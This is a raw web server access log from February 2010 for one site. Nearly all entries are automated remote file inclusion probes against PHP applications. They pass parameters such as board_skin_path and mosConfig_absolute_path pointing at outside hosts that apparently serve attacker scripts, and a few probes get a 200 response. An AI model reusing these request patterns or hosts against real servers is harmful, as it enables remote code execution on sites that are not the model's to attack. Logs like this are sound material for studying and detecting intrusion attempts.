77.79.246.80 - - [10/Feb/2010:04:44:52 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:44:52 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:44:52 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:25 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:25 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:45:25 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:25 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:27 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:27 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:27 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:04:45:28 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:45:53 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:46:28 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:46:43 -0800] "GET /logs/access_100204.log//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:46:51 -0800] "GET /logs/access_100117.log//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:46:53 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:46:58 -0800] "GET /logs/access_100204.log//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:47:16 -0800] "GET /logs/access_100117.log//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:48:49 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:48:50 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:49:57 -0800] "GET /logs/access_100114.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:50:43 -0800] "GET /logs/access_100201.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:52:18 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:52:18 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:52:34 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:52:34 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:53:23 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:53:44 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:54:07 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:54:26 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:54:35 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:54:41 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.gehadnasser.com/id.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:54:41 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:54:46 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:54:57 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:55:04 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:55:22 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:55:25 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.101.2.63 - - [10/Feb/2010:04:55:45 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:08 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:08 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:10 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:16 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:17 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:56:17 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:10 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:10 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:10 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:11 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:11 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:11 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:24 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:24 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:24 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:59 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:57:59 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:02 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:02 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:02 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:07 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:07 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:08 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:08 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:08 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:58:08 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [10/Feb/2010:04:58:13 -0800] "GET /logs/access_100103.log//bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [10/Feb/2010:04:58:13 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [10/Feb/2010:04:58:13 -0800] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [10/Feb/2010:04:58:15 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [10/Feb/2010:04:58:19 -0800] "GET /logs/access_100119.log//bbs/skin/zero_vote/setup.php?dir=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:25 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:28 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:58:29 -0800] "GET /logs/access_100121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [10/Feb/2010:04:58:30 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:24 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:24 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:24 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:25 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:25 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:04:59:28 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:01:03 -0800] "GET /logs/access_100119.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:01:24 -0800] "GET /logs/access_100121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:02:17 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:31 -0800] "GET /write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:31 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:33 -0800] "GET /logs//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:40 -0800] "GET /write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:40 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [10/Feb/2010:05:03:40 -0800] "GET /logs//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:03:53 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:05:03:53 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:05:20 -0800] "GET /logs//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:05:20 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:05:20 -0800] "GET /write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:06:28 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:06:30 -0800] "GET /logs/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:06:33 -0800] "GET /logs/access_100119.log%20%20/prodler.class.php=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:07:47 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:07:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:07:55 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:40 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:08:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:08:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:08:43 -0800] "GET /logs/access_100105.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:47 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:48 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:48 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:50 -0800] "GET /logs/access_100203.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:51 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [10/Feb/2010:05:08:53 -0800] "GET /logs/access_100129.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:53 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:05:08:54 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:05:09:31 -0800] "GET /logs/access_100114.log%20%20/modules/My_eGallery/index.php?basepath=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:09:34 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:05:09:34 -0800] "GET /logs/access_100203.log%20%20//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
